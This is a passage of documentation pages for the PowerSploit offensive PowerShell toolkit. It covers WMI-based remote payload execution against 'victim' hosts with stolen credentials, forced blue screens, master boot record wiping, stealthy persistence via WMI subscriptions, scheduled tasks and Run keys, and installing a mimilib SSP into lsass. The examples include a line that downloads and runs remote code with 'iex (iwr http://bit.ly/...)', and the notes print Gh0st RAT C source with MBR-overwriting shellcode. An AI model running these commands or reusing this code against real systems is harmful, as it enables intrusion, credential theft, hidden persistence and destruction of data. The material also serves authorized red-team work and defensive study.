Byte[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Force\r\nInjects shellcode without prompting for confirmation.\r\nBy default, Invoke-Shellcode prompts for confirmation before performing any malicious act.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/CodeExecution/Invoke-WmiCommand.md",
    "content": "# Invoke-WmiCommand\r\n\r\n## SYNOPSIS\r\nExecutes a PowerShell ScriptBlock on a target computer using WMI as a\r\npure C2 channel.\r\n\r\nAuthor: Matthew Graeber  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nInvoke-WmiCommand [-Payload] <ScriptBlock> [[-RegistryHive] <String>] [[-RegistryKeyPath] <String>]\r\n [[-RegistryPayloadValueName] <String>] [[-RegistryResultValueName] <String>] [[-ComputerName] <String[]>]\r\n [[-Credential] <PSCredential>] [[-Impersonation] <ImpersonationLevel>]\r\n [[-Authentication] <AuthenticationLevel>] [-EnableAllPrivileges] [[-Authority] <String>]\r\n```\r\n\r\n## DESCRIPTION\r\nInvoke-WmiCommand executes a PowerShell ScriptBlock on a target\r\ncomputer using WMI as a pure C2 channel.\r\nIt does this by using the\r\nStdRegProv WMI registry provider methods to store a payload into a\r\nregistry value.\r\nThe command is then executed on the victim system and\r\nthe output is stored in another registry value that is then retrieved\r\nremotely.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nInvoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\\TargetUser' -ComputerName '10.10.1.1'\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$Hosts = Get-Content hostnames.txt\r\n```\r\n\r\nPS C:\\\\\\>$Payload = Get-Content payload.ps1\r\nPS C:\\\\\\>$Credential = Get-Credential 'TargetDomain\\TargetUser'\r\nPS C:\\\\\\>$Hosts | Invoke-WmiCommand -Payload $Payload -Credential $Credential\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$Payload = Get-Content payload.ps1\r\n```\r\n\r\nPS C:\\\\\\>Invoke-WmiCommand -Payload $Payload -Credential 'TargetDomain\\TargetUser' -ComputerName '10.10.1.1', '10.10.1.2'\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nInvoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath 'SOFTWARE\\testkey' -RegistryPayloadValueName 'testvalue' -RegistryResultValueName 'testresult' -ComputerName '10.10.1.1' -Credential 'TargetHost\\Administrator' -Verbose\r\n```\r\n\r\n## PARAMETERS\r\n\r\n### -Payload\r\nSpecifies the payload to be executed on the remote system.\r\n\r\n```yaml\r\nType: ScriptBlock\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -RegistryHive\r\n{{Fill RegistryHive Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 2\r\nDefault value: HKEY_CURRENT_USER\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -RegistryKeyPath\r\nSpecifies the registry key where the payload and payload output will\r\nbe stored.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 3\r\nDefault value: SOFTWARE\\Microsoft\\Cryptography\\RNG\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -RegistryPayloadValueName\r\nSpecifies the registry value name where the payload will be stored.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 4\r\nDefault value: Seed\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -RegistryResultValueName\r\nSpecifies the registry value name where the payload output will be\r\nstored.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 5\r\nDefault value: Value\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerName\r\nRuns the command on the specified computers.\r\nThe default is the local\r\ncomputer.\r\n\r\nType the NetBIOS name, an IP address, or a fully qualified domain\r\nname of one or more computers.\r\nTo specify the local computer, type\r\nthe computer name, a dot (.), or \"localhost\".\r\n\r\nThis parameter does not rely on Windows PowerShell remoting.\r\nYou can\r\nuse the ComputerName parameter even if your computer is not\r\nconfigured to run remote commands.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: Cn\r\n\r\nRequired: False\r\nPosition: 6\r\nDefault value: Localhost\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nSpecifies a user account that has permission to perform this action.\r\nThe default is the current user.\r\nType a user name, such as \"User01\",\r\n\"Domain01\\User01\", or User@Contoso.com.\r\nOr, enter a PSCredential\r\nobject, such as an object that is returned by the Get-Credential\r\ncmdlet.\r\nWhen you type a user name, you will be prompted for a\r\npassword.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 7\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Impersonation\r\nSpecifies the impersonation level to use.\r\nValid values are:\r\n\r\n0: Default (Reads the local registry for the default impersonation level, which is usually set to \"3: Impersonate\".)\r\n\r\n1: Anonymous (Hides the credentials of the caller.)\r\n\r\n2: Identify (Allows objects to query the credentials of the caller.)\r\n\r\n3: Impersonate (Allows objects to use the credentials of the caller.)\r\n\r\n4: Delegate (Allows objects to permit other objects to use the credentials of the caller.)\r\n\r\n```yaml\r\nType: ImpersonationLevel\r\nParameter Sets: (All)\r\nAliases: \r\nAccepted values: Default, Anonymous, Identify, Impersonate, Delegate\r\n\r\nRequired: False\r\nPosition: 8\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Authentication\r\nSpecifies the authentication level to be used with the WMI connection.\r\nValid values are:\r\n\r\n-1: Unchanged\r\n\r\n0: Default\r\n\r\n1: None (No authentication in performed.)\r\n\r\n2: Connect (Authentication is performed only when the client establishes a relationship with the application.)\r\n\r\n3: Call (Authentication is performed only at the beginning of each call when the application receives the request.)\r\n\r\n4: Packet (Authentication is performed on all the data that is received from the client.)\r\n\r\n5: PacketIntegrity (All the data that is transferred between the client  and the application is authenticated and verified.)\r\n\r\n6: PacketPrivacy (The properties of the other authentication levels are used, and all the data is encrypted.)\r\n\r\n```yaml\r\nType: AuthenticationLevel\r\nParameter Sets: (All)\r\nAliases: \r\nAccepted values: Default, None, Connect, Call, Packet, PacketIntegrity, PacketPrivacy, Unchanged\r\n\r\nRequired: False\r\nPosition: 9\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -EnableAllPrivileges\r\nEnables all the privileges of the current user before the command\r\nmakes the WMI call.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Authority\r\nSpecifies the authority to use to authenticate the WMI connection.\r\nYou can specify standard NTLM or Kerberos authentication.\r\nTo use\r\nNTLM, set the authority setting to ntlmdomain:\\<DomainName\\>, where\r\n\\<DomainName\\> identifies a valid NTLM domain name.\r\nTo use Kerberos,\r\nspecify kerberos:\\<DomainName\\ServerName\\>.\r\nYou cannot include the\r\nauthority setting when you connect to the local computer.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 10\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### System.String[]\r\n\r\nAccepts one or more host names/IP addresses over the pipeline.\r\n\r\n## OUTPUTS\r\n\r\n### System.Management.Automation.PSObject\r\n\r\nOutputs a custom object consisting of the target computer name and\r\nthe output of the command executed.\r\n\r\n## NOTES\r\nIn order to receive the output from your payload, it must return\r\nactual objects.\r\nFor example, Write-Host doesn't return objects\r\nrather, it writes directly to the console.\r\nIf you're using\r\nWrite-Host in your scripts though, you probably don't deserve to get\r\nthe output of your payload back.\r\n:P\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Mayhem/Set-CriticalProcess.md",
    "content": "# Set-CriticalProcess\r\n\r\n## SYNOPSIS\r\nCauses your machine to blue screen upon exiting PowerShell.\r\n\r\nPowerSploit Function: Set-CriticalProcess  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nSet-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm]\r\n```\r\n\r\n## DESCRIPTION\r\n{{Fill in the Description}}\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nSet-CriticalProcess\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nSet-CriticalProcess -ExitImmediately\r\n```\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nSet-CriticalProcess -Force -Verbose\r\n```\r\n\r\n## PARAMETERS\r\n\r\n### -Force\r\nSet the running PowerShell process as critical without asking for confirmation.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ExitImmediately\r\nImmediately exit PowerShell after successfully marking the process as critical.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -WhatIf\r\nShows what would happen if the cmdlet runs.\r\nThe cmdlet is not run.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: wi\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Confirm\r\nPrompts you for confirmation before running the cmdlet.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: cf\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Mayhem/Set-MasterBootRecord.md",
    "content": "# Set-MasterBootRecord\r\n\r\n## SYNOPSIS\r\nProof of concept code that overwrites the master boot record with the\r\nmessage of your choice.\r\n\r\nPowerSploit Function: Set-MasterBootRecord  \r\nAuthor: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nSet-MasterBootRecord [[-BootMessage] <String>] [-RebootImmediately] [-Force] [-WhatIf] [-Confirm]\r\n```\r\n\r\n## DESCRIPTION\r\nSet-MasterBootRecord is proof of concept code designed to show that it is\r\npossible with PowerShell to overwrite the MBR.\r\nThis technique was taken\r\nfrom a public malware sample.\r\nThis script is inteded solely as proof of\r\nconcept code.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nSet-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'\r\n```\r\n\r\n## PARAMETERS\r\n\r\n### -BootMessage\r\nSpecifies the message that will be displayed upon making your computer a brick.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: Stop-Crying; Get-NewHardDrive\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -RebootImmediately\r\nReboot the machine immediately upon overwriting the MBR.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Force\r\nSuppress the warning prompt.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -WhatIf\r\nShows what would happen if the cmdlet runs.\r\nThe cmdlet is not run.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: wi\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Confirm\r\nPrompts you for confirmation before running the cmdlet.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: cf\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\nObviously, this will only work if you have a master boot record to\r\noverwrite.\r\nThis won't work if you have a GPT (GUID partition table).\r\n\r\nThis code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):\r\n\r\n// CGh0stApp message handlers\r\n\r\nunsigned char scode\\[\\] =\r\n\"\\xb8\\x12\\x00\\xcd\\x10\\xbd\\x18\\x7c\\xb9\\x18\\x00\\xb8\\x01\\x13\\xbb\\x0c\"\r\n\"\\x00\\xba\\x1d\\x0e\\xcd\\x10\\xe2\\xfe\\x49\\x20\\x61\\x6d\\x20\\x76\\x69\\x72\"\r\n\"\\x75\\x73\\x21\\x20\\x46\\x75\\x63\\x6b\\x20\\x79\\x6f\\x75\\x20\\x3a\\x2d\\x29\";\r\n\r\nint CGh0stApp::KillMBR()\r\n{\r\n\tHANDLE hDevice;\r\n\tDWORD dwBytesWritten, dwBytesReturned;\r\n\tBYTE pMBR\\[512\\] = {0};\r\n\r\n\t// ????MBR\r\n\tmemcpy(pMBR, scode, sizeof(scode) - 1);\r\n\tpMBR\\[510\\] = 0x55;\r\n\tpMBR\\[511\\] = 0xAA;\r\n\r\n\thDevice = CreateFile\r\n\t\t(\r\n\t\t\"\\\\\\\\\\\\\\\\.\\\\\\\\PHYSICALDRIVE0\",\r\n\t\tGENERIC_READ | GENERIC_WRITE,\r\n\t\tFILE_SHARE_READ | FILE_SHARE_WRITE,\r\n\t\tNULL,\r\n\t\tOPEN_EXISTING,\r\n\t\t0,\r\n\t\tNULL\r\n\t\t);\r\n\tif (hDevice == INVALID_HANDLE_VALUE)\r\n\t\treturn -1;\r\n\tDeviceIoControl\r\n\t\t(\r\n\t\thDevice,\r\n\t\tFSCTL_LOCK_VOLUME,\r\n\t\tNULL,\r\n\t\t0,\r\n\t\tNULL,\r\n\t\t0,\r\n\t\t&dwBytesReturned,\r\n\t\tNUL\r\n\t\t)\r\n\t// ??????\r\n\tWriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);\r\n\tDeviceIoControl\r\n\t\t(\r\n\t\thDevice,\r\n\t\tFSCTL_UNLOCK_VOLUME,\r\n\t\tNULL,\r\n\t\t0,\r\n\t\tNULL,\r\n\t\t0,\r\n\t\t&dwBytesReturned,\r\n\t\tNULL\r\n\t\t);\r\n\tCloseHandle(hDevice);\r\n\r\n\tExitProcess(-1);\r\n\treturn 0;\r\n}\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Persistence/Add-Persistence.md",
    "content": "# Add-Persistence\r\n\r\n## SYNOPSIS\r\nAdd persistence capabilities to a script.\r\n\r\nPowerSploit Function: Add-Persistence  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n### ScriptBlock\r\n```\r\nAdd-Persistence -ScriptBlock <ScriptBlock> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>\r\n [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]\r\n [-DoNotPersistImmediately] [-PassThru]\r\n```\r\n\r\n### FilePath\r\n```\r\nAdd-Persistence -FilePath <String> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>\r\n [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]\r\n [-DoNotPersistImmediately] [-PassThru]\r\n```\r\n\r\n## DESCRIPTION\r\nAdd-Persistence will add persistence capabilities to any script or scriptblock.\r\nThis function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\n$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'\r\n```\r\n\r\n$UserOptions = New-UserPersistenceOption -Registry -AtLogon\r\nAdd-Persistence -FilePath .\\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose\r\n\r\nDescription\r\n-----------\r\nCreates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs.\r\nelevated) determined at runtime.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }\r\n```\r\n\r\n$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle\r\n$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle\r\nAdd-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\\EncodedPersistentScript.ps1\r\n\r\nDescription\r\n-----------\r\nCreates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs.\r\nelevated) determined at runtime.\r\nThe output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement.\r\nThe final, encoded output is finally saved to .\\EncodedPersistentScript.ps1\r\n\r\n## PARAMETERS\r\n\r\n### -ScriptBlock\r\nSpecifies a scriptblock containing your payload.\r\n\r\n```yaml\r\nType: ScriptBlock\r\nParameter Sets: ScriptBlock\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FilePath\r\nSpecifies the path to your payload.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: FilePath\r\nAliases: Path\r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ElevatedPersistenceOption\r\nSpecifies the trigger for the persistent payload if the target is running elevated.\r\nYou must run New-ElevatedPersistenceOption to generate this argument.\r\n\r\n```yaml\r\nType: Object\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -UserPersistenceOption\r\nSpecifies the trigger for the persistent payload if the target is not running elevated.\r\nYou must run New-UserPersistenceOption to generate this argument.\r\n\r\n```yaml\r\nType: Object\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -PersistenceScriptName\r\nSpecifies the name of the function that will wrap the original payload.\r\nThe default value is 'Update-Windows'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Update-Windows\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -PersistentScriptFilePath\r\nSpecifies the path where you would like to output the persistence script.\r\nBy default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: \"$PWD\\Persistence.ps1\"\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -RemovalScriptFilePath\r\nSpecifies the path where you would like to output a script that will remove the persistent payload.\r\nBy default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: \"$PWD\\RemovePersistence.ps1\"\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -DoNotPersistImmediately\r\nOutput only the wrapper function for the original payload.\r\nBy default, Add-Persistence will output a script that will automatically attempt to persist (e.g.\r\nit will end with 'Update-Windows -Persist').\r\nIf you are in a position where you are running in memory but want to persist at a later time, use this option.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -PassThru\r\nOutputs the contents of the persistent script to the pipeline.\r\nThis option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### None\r\n\r\nAdd-Persistence cannot receive any input from the pipeline.\r\n\r\n## OUTPUTS\r\n\r\n### System.Management.Automation.ScriptBlock\r\n\r\nIf the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script.\r\n\r\n## NOTES\r\nWhen the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine.\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.exploit-monday.com](http://www.exploit-monday.com)\r\n\r\n"
  },
  {
    "path": "docs/Persistence/Get-SecurityPackage.md",
    "content": "# Get-SecurityPackage\r\n\r\n## SYNOPSIS\r\nEnumerates all loaded security packages (SSPs).\r\n\r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-SecurityPackage\r\n```\r\n\r\n## DESCRIPTION\r\nGet-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.\r\nIt also parses the returned SecPkgInfo struct array.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-SecurityPackage\r\n```\r\n\r\n## PARAMETERS\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Persistence/Install-SSP.md",
    "content": "# Install-SSP\r\n\r\n## SYNOPSIS\r\nInstalls a security support provider (SSP) dll.\r\n\r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nInstall-SSP [[-Path] <String>]\r\n```\r\n\r\n## DESCRIPTION\r\nInstall-SSP installs an SSP dll.\r\nInstallation involves copying the dll to\r\n%windir%\\System32 and adding the name of the dll to\r\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nInstall-SSP -Path .\\mimilib.dll\r\n```\r\n\r\n## PARAMETERS\r\n\r\n### -Path\r\n{{Fill Path Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\nThe SSP dll must match the OS architecture.\r\ni.e.\r\nYou must have a 64-bit SSP dll\r\nif you are running a 64-bit OS.\r\nIn order for the SSP dll to be loaded properly\r\ninto lsass, the dll must export SpLsaModeInitialize.\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Persistence/New-ElevatedPersistenceOption.md",
    "content": "# New-ElevatedPersistenceOption\r\n\r\n## SYNOPSIS\r\nConfigure elevated persistence options for the Add-Persistence function.\r\n\r\nPowerSploit Function: New-ElevatedPersistenceOption  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n### PermanentWMIAtStartup\r\n```\r\nNew-ElevatedPersistenceOption [-PermanentWMI] [-AtStartup]\r\n```\r\n\r\n### PermanentWMIDaily\r\n```\r\nNew-ElevatedPersistenceOption [-PermanentWMI] [-Daily] -At <DateTime>\r\n```\r\n\r\n### ScheduledTaskOnIdle\r\n```\r\nNew-ElevatedPersistenceOption [-ScheduledTask] [-OnIdle]\r\n```\r\n\r\n### ScheduledTaskAtLogon\r\n```\r\nNew-ElevatedPersistenceOption [-ScheduledTask] [-AtLogon]\r\n```\r\n\r\n### ScheduledTaskHourly\r\n```\r\nNew-ElevatedPersistenceOption [-ScheduledTask] [-Hourly]\r\n```\r\n\r\n### ScheduledTaskDaily\r\n```\r\nNew-ElevatedPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>\r\n```\r\n\r\n### Registry\r\n```\r\nNew-ElevatedPersistenceOption [-Registry] [-AtLogon]\r\n```\r\n\r\n## DESCRIPTION\r\nNew-ElevatedPersistenceOption allows for the configuration of elevated persistence options.\r\nThe output of this function is a required parameter of Add-Persistence.\r\nAvailable persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\n$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup\r\n```\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle\r\n```\r\n\r\n## PARAMETERS\r\n\r\n### -PermanentWMI\r\nPersist via a permanent WMI event subscription.\r\nThis option will be the most difficult to detect and remove.\r\n\r\nDetection Difficulty:        Difficult\r\nRemoval Difficulty:          Difficult\r\nUser Detectable? \r\nNo\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: PermanentWMIAtStartup, PermanentWMIDaily\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ScheduledTask\r\nPersist via a scheduled task.\r\n\r\nDetection Difficulty:        Moderate\r\nRemoval Difficulty:          Moderate\r\nUser Detectable? \r\nNo\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: ScheduledTaskOnIdle, ScheduledTaskAtLogon, ScheduledTaskHourly, ScheduledTaskDaily\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Registry\r\nPersist via the HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry key.\r\nNote: This option will briefly pop up a PowerShell console to the user.\r\n\r\nDetection Difficulty:        Easy\r\nRemoval Difficulty:          Easy\r\nUser Detectable? \r\nYes\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: Registry\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Daily\r\nStarts the payload 